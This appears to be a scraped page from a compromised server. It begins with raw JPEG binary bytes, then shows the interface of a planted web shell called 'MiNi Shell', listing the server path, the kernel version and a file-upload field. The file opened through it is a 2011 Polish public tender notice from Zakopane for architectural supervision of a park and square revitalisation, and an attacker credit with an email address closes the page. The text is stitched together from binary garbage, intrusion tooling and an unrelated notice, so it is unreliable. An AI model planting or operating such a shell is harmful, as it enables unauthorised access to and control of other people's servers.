JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111227/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111227/345177-N-2011.html

<p class="kh_header"><b>Zakopane: BZP.271.144.2011 pełnienie funkcji  nadzoru autorskiego  nad wykonaniem dokumentacji wykonawczej, wykonaniem  robót budowlanych  i urządzenia  zieleni wraz z wykonaniem dostawą i montażem wyposażenia dla zadania nr45/2011 Rewitalizacja centrum Miasta Zakopane obejmująca Rewitalizację Parku Miejskiego i Przebudowę Placu Niepodległości w Zakopanem w celu dostosowania do potrzeb mieszkańców i wymogów ruchu turystycznego, dla działania 6.1: Rozwój miast schemat A MRPO.</b><br>
<b>Numer ogłoszenia: 345177 - 2011; data zamieszczenia: 27.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasta Zakopane , ul. T. Kościuszki 13, 34-500 Zakopane, woj. małopolskie, tel. 018 2020448, faks 018 2020448.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.zakopane.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> BZP.271.144.2011 pełnienie funkcji  nadzoru autorskiego  nad wykonaniem dokumentacji wykonawczej, wykonaniem  robót budowlanych  i urządzenia  zieleni wraz z wykonaniem dostawą i montażem wyposażenia dla zadania nr45/2011 Rewitalizacja centrum Miasta Zakopane obejmująca Rewitalizację Parku Miejskiego i Przebudowę Placu Niepodległości w Zakopanem w celu dostosowania do potrzeb mieszkańców i wymogów ruchu turystycznego, dla działania 6.1: Rozwój miast schemat A MRPO..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 3.Opis przedmiotu zamówienia:
3.1.pełnienie funkcji nadzoru autorskiego  nad wykonaniem dokumentacji wykonawczej, wykonaniem robót budowlanych i urządzenia zieleni wraz z wykonaniem dostawą i montażem wyposażenia dla zadania nr45/2011 Rewitalizacja centrum Miasta Zakopane obejmująca Rewitalizację Parku Miejskiego i Przebudowę Placu Niepodległości w Zakopanem w celu dostosowania do potrzeb mieszkańców 
i wymogów ruchu turystycznego, dla działania 6.1: Rozwój miast schemat A MRPO, które obejmuje następujące charakterystyczne obiekty:
3.1.1. Przebudowa drogi K 420163 o nazwie ul. Gen. Andrzeja Galicy na łącznej długości ok. 80 mb. 
3.1.2.	Przebudowa drogi K 420230 o nazwie ul. Staszica od wjazdu do hotelu Litwor 
do ul. Grunwaldzkiej na łącznej długości drogi ok. 200 mb. 
3.1.3.	Przebudowa części drogi K 420168 o nazwie ul. Grunwaldzkiej na długości 
ok. 300 mb.
3.1.4.	Przebudowa drogi K 420202 o nazwie: Plac Niepodległości o pow. ok. 5900 m2  
wraz z przyległym terenem zielonym.
3.1.5.	 Przebudowa Parku Miejskiego o pow. ok. 22 000 m2.
3.1.6.	Regulacja potoku Czarny na długości ok. 240 mb.
3.1.7.	Remont konserwatorski budynku TCKS Jutrzenka wraz z otoczeniem przy 
ul. Grunwaldzkiej 3.
3.1.8.	Przebudowa i rozbudowa budynku dawnych sanitariatów miejskich
 przy ul. Staszica 13.
3.1.9.	Budowa muszli koncertowej na terenie Parku Miejskiego.
3.1.10. Budowa szaletów podziemnych na Placu Niepodległości.
3.2.	Rodzaj prac i robót objętych nadzorem autorskim szczegółowo opisują dołączone do SIWZ:
3.2.1.	Program Funkcjonalno Użytkowy ( PFU).
3.2.2.	Projekt budowlany (PB).
3.3.	 Zakres obowiązków nadzoru wynika z art. 20 ust.1 p.4 ustawy z dnia 7 lipca 1994 r. - Prawo budowlane (jednolity tekst: Dz. U. z 2006 r. Nr 156, poz. 1118, z późn. zmianami) i będzie obejmował w szczególności następujące obowiązki:
3.3.1.	Stwierdzanie w toku wykonywania robót budowlanych zgodności realizacji z projektem budowlanym i projektami wykonawczymi, 
3.3.2.	Wyjaśnianie wątpliwości dotyczących projektu budowlanego oraz zawartych 
w nim rozwiązań, a także PFU.
3.3.3.	Konsultowanie, wydawanie wytycznych i uzgadnianie rozwiązań projektowych, wprowadzanych do wykonywanych przez Wykonawcę projektów wykonawczych lub projektów budowlanych zamiennych a także STWiOR - w zakresie ich zgodności z założeniami autorskimi przyjętymi w projekcie budowlanym, jak również z wytycznymi wynikającymi z koncepcji wyłonionej w wyniku rozstrzygnięcia konkursu na wykonanie koncepcji architektoniczno-przestrzennej dla zadania Rewitalizacja Parku Miejskiego i Przebudowa Placu Niepodległości w Zakopanem w celu dostosowania do potrzeb mieszkańców i wymogów ruchu turystycznego i wytycznymi pokonkursowymi, 
3.3.4.	W razie zaistnienia takiej konieczności proponowanie rozwiązań projektowych
 w formie szkiców, rysunków roboczych i opisów, a także uzgadnianie 
i zatwierdzanie rozwiązań i szczegółów technicznych z wykonawcą projektu wykonawczego a także STWiOR,
3.3.5.	Uzgadnianie możliwości wprowadzenia rozwiązań zamiennych 
lub równoważnych w stosunku do przewidzianych w projekcie budowlanym, zgłoszonych przez autora projektu wykonawczego, kierownika budowy 
lub inspektora nadzoru inwestorskiego, w szczególności w odniesieniu 
do materiałów i konstrukcji oraz rozwiązań architektonicznych, technicznych 
i technologicznych,
3.3.6.	Udział w czynnościach mających na celu doprowadzenie do uzyskania projektowanych zdolności użytkowych całego przedsięwzięcia inwestycyjnego,
3.3.7.	Operatywne współdziałanie z uczestnikami procesu budowlanego, 
3.3.8.	Przeprowadzanie kontroli budowy, udział w komisjach i naradach technicznych organizowanych przez Zleceniodawcę oraz Wykonawcę w zakresie opisanym 
w Umowie osobiście lub przez upoważnionego przedstawiciela..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.24.80.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.07.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 11.	Wadium przetargowe
11.1.	Każdy wykonawca jest zobowiązany wnieść wadium przetargowe w wysokości 
 5.000,00  PLN ( słownie:  pięć tysięcy złotych )
11.1.1.Wadium może być wnoszone w jednej lub w kilku  następujących formach: 
             - pieniądzu;
             -poręczeniach bankowych lub poręczeniach spółdzielczej kasy                   
               oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze      poręczeniem pieniężnym; 
             -poręczeniach bankowych;
             -gwarancjach bankowych;
             -gwarancjach ubezpieczeniowych;
            -poręczeniach udzielanych przez podmioty, o których mowa w art. 6 lit. b ust.  5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji       Rozwoju Przedsiębiorczości (Dz.U z 2007r. Nr 42 poz.275 z późn. zm.)
11.2.Wadium przetargowe w  pieniądzu należy wnieść  przelewem na konto Urzędu Miasta Zakopane w PEKAO S.A. w Zakopanem nr: 85 1240 4748 1111 0000 4871 8666 .
11.3.Wadium powinno znajdować się na koncie zamawiającego najpóźniej w terminie składania ofert tj. 05 stycznia  2012  r. do godz.  12°°.
11.4.Wadium wnoszone w pozostałych formach należy złożyć w postaci oryginału, najpóźniej w terminie składania ofert tj. 05 stycznia 2012 r. do godz. 12°w Biurze  ds. Zamówień Publicznych pok. nr 8 (parter).
11.5.UWAGA! Nie wolno oryginałów tych dokumentów wkładać do oferty.
11.6.ZWROT WADIUM : 
11.6.1.Zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem że Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3ustawy  nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy,  lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie. 
11.6.2.Zamawiający zwraca niezwłocznie wadium na wniosek wykonawcy który wycofał ofertę przed upływem terminu składania ofert.
11.6.3.Zamawiający żąda ponownego wniesienia wadium przez wykonawcę którym zwrócono wadium na podstawie ust.1  jeżeli w wyniku  ostatecznego rozstrzygnięcia protestu jego oferta została  wybrana jako najkorzystniejsza. Wykonawca wnosi wadium  w terminie określonym przez Zamawiającego.
11.6.4.Jeżeli wadium wniesiono w pieniądzu, zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku banko?wego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę.
11.6.5.Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana:
-odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
-   zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe 
              z przyczyn leżących po stronie wykonawcy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli wykonawca złoży stosowne             oświadczenie
Ocena spełnienia powyższego  warunku  będzie dokonywana metodą spełnia lub 
nie spełnia, w oparciu o wymagane dokumenty i oświadczenia dołączone do oferty</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony ,jeżeli   wykonawca wykaże ,że w ciągu ostatnich 3 lat przed upływem terminu składania ofert,  a jeżeli okres                prowadzenia działalności jest krótszy w tym w tym okresie, pełnili nadzór autorski, nad co najmniej 2 inwestycjami o zakresie odpowiadającym swoim rodzajem stanowiącym przedmiot zamówienia, tj., dowolną inwestycja użyteczności publicznej, w której skład wchodziły, co najmniej jeden obiekt kubaturowy, drogowy i urządzanie zieleni.
Ocena spełnienia powyższego  warunku  będzie dokonywana metodą spełnia lub  nie spełnia, w oparciu o wymagane dokumenty i oświadczenia dołączone do  oferty .</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli wykonawca złoży stosowne 
oświadczenie
Ocena spełnienia powyższego  warunku  będzie dokonywana metodą spełnia 
lub nie spełnia, w oparciu o wymagane dokumenty i oświadczenia dołączone  
do oferty .</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek  zostanie uznany za spełniony ,jeżeli  wykonawca wykaże  ,że zapewni  
 wykonanie zamówienia przez osoby które są  autorami poszczególnych branż projektu budowlanego lub uzyskają zgodę autorów projektu budowlanego na pełnienie w ich imieniu nadzoru autorskiego oraz uzyskają prawa do akceptowania i wprowadzania zmian do projektu budowlanego  w tym w szczególności: 
Zapewnią nadzór autorski dla wszystkich robót budowlanych, montażu wyposażenia i urządzania zieleni przez osobę, posiadającą uprawnienia budowlane do projektowania w specjalności architektonicznej bez ograniczeń lub odpowiadającymi wydanymi na podstawie wcześniejszych przepisów, należącą do właściwej Izby Architektów i legitymującą się, co najmniej 5 letnim doświadczeniem zawodowym w pełnieniu samodzielnych funkcji technicznych związanych z projektowaniem, 
Zapewnią nadzór autorski robót ogólnobudowlanych, hydrotechnicznych 
i montażu wyposażenia przez osobę, posiadającą uprawnienia budowlane do projektowania w specjalności konstrukcyjno - budowlanej bez ograniczeń lub odpowiadającymi wydanymi na podstawie wcześniejszych przepisów, należącą do właściwej Izby Inżynierów Budownictwa i legitymującą się, co najmniej 5 letnim doświadczeniem zawodowym w pełnieniu samodzielnych funkcji technicznych związanych z projektowaniem, 
Zapewnią nadzór autorski robót budowlanych na obiektach objętych ochroną 
konserwatorską przez osobę, posiadającą uprawnienia budowlane do projektowania w specjalności konstrukcyjno - budowlanej bez ograniczeń 
lub odpowiadającymi wydanymi na podstawie wcześniejszych przepisów, należącą do właściwej Izby Inżynierów Budownictwa oraz uprawnienia do kierowania robotami budowlanymi przy zabytkach nieruchomych spełniające warunki Rozporządzenia Ministra Kultury z dnia 9 czerwca 2004r. w sprawie prowadzenia prac konserwatorskich, restauratorskich, robót budowlanych, badań konserwatorskich i architektonicznych, a także innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych i poszukiwań ukrytych lub porzuconych zabytków ruchomych (Dz. U z 2004 r., nr 150 poz. 1579), legitymującymi się, co najmniej 5 letnim doświadczeniem zawodowym w pełnieniu samodzielnych funkcji technicznych związanych z projektowaniem
Zapewnią nadzór autorski robót budowlanych drogowych przez osobę, posiadającą uprawnienia budowlane do projektowania w specjalności drogowej bez ograniczeń lub odpowiadającymi wydanymi na podstawie wcześniejszych przepisów, należącą do właściwej Izby Inżynierów Budownictwa i legitymującą się, co najmniej 5 letnim doświadczeniem zawodowym w pełnieniu samodzielnych funkcji technicznych związanych z projektowaniem,
Zapewnią nadzór autorski robót budowlanych w zakresie instalacji sanitarnych 
i gazowych przez osobę, posiadającą uprawnienia budowlane do projektowania
 w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń lub odpowiadającymi wydanymi na podstawie wcześniejszych przepisów należącą do właściwej Izby Inżynierów Budownictwa i legitymującą się, co najmniej 5 letnim doświadczeniem zawodowym w pełnieniu samodzielnych funkcji technicznych związanych z projektowaniem, 
Zapewnią nadzór autorski robót budowlanych w zakresie instalacji elektrycznych 
i elektroenergetycznych przez osobę, posiadającą uprawnienia budowlane 
do projektowania w specjalności instalacyjnej zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń lub odpowiadającymi wydanymi na podstawie wcześniejszych przepisów, należącą do właściwej Izby Inżynierów Budownictwa i legitymującą się, co najmniej 5 letnim doświadczeniem zawodowym w pełnieniu samodzielnych funkcji technicznych związanych z projektowaniem,
Zapewnią nadzór autorski robót budowlanych w zakresie instalacji teletechnicznych przez osobę, posiadającą uprawnienia budowlane do projektowania w specjalności telekomunikacyjnej bez ograniczeń lub odpowiadającymi wydanymi na podstawie wcześniejszych przepisów, należącą do właściwej Izby Inżynierów Budownictwa i legitymujące się, co najmniej 5 letnim doświadczeniem zawodowym w pełnieniu samodzielnych funkcji technicznych związanych z projektowaniem,
Zapewnią nadzór autorski nad urządzeniem zieleni, przez osoby, posiadające wykształcenie ogrodnicze i legitymującymi się, co najmniej 5 letnim doświadczeniem zawodowym w projektowaniu zieleni.
Ocena spełnienia powyższego  warunku  będzie dokonywana metodą spełnia   
lub nie spełnia, w oparciu o wymagane dokumenty i oświadczenia dołączone            do oferty .</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli wykonawca złoży stosowne 
oświadczenie
Ocena spełnienia powyższego  warunku  będzie dokonywana metodą spełnia 
lub nie spełnia, w oparciu o wymagane dokumenty i oświadczenia dołączone  
do oferty .</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W oparciu o art.144 ust.1 ustawy zamawiający  uprzejmie informuje, że przewiduje    
  dokonanie  zmiany osoby/osób  przewidzianych do realizacji przedmiotu zamówienia, 
    przedstawionych w ofercie, jedynie za uprzednią pisemną zgodą Zamawiającego,   
   akceptującego nową wskazana przez wykonawcę  osobę w następujących przypadkach:
śmierci, choroby lub innych zdarzeń losowych,
niewywiązywania się  inspektora  nadzoru autorskiego  z obowiązków wynikających z umowy 
jeżeli zmiana  inspektora nadzoru  autorskiego  stanie się konieczna z jakichkolwiek innych     przyczyn   niezależnych od wykonawcy  (np. rezygnacji , utraty uprawnień itp.).
 W przypadku zmiany   osoby pełniącej funkcje inspektora nadzoru  nowy inspektor    
 musi spełniać wymagania określone  przez zamawiającego w siwz. 
Zmiany wysokości wynagrodzenia - na wskutek rezygnacji z wykonania części robót  objętych nadzorem wraz z określeniem maksymalnej wielkości tych robót i określeniem kwoty należnej za tą cześć w granicach udokumentowanego interesu Zamawiającego.
Zmiany sposobu płatności w szczególności ilości faktur przejściowych</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zakopane.eu pod linkiem Zamówienia  publiczne postępowania poniżej  wartości  art.11.8<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wydział Rozwoju Lokalnego i Inwestycji pok. nr 20 Urzędu Miasta Zakopane ul. Kościuszki 13 34-500 Zakopane..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.01.2012 godzina 12:00, miejsce: Biuro d.s zamówień publicznych pok. nr 8 Urzędu Miasta Zakopane ul. Kościuszki 13 34-500 Zakopane..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com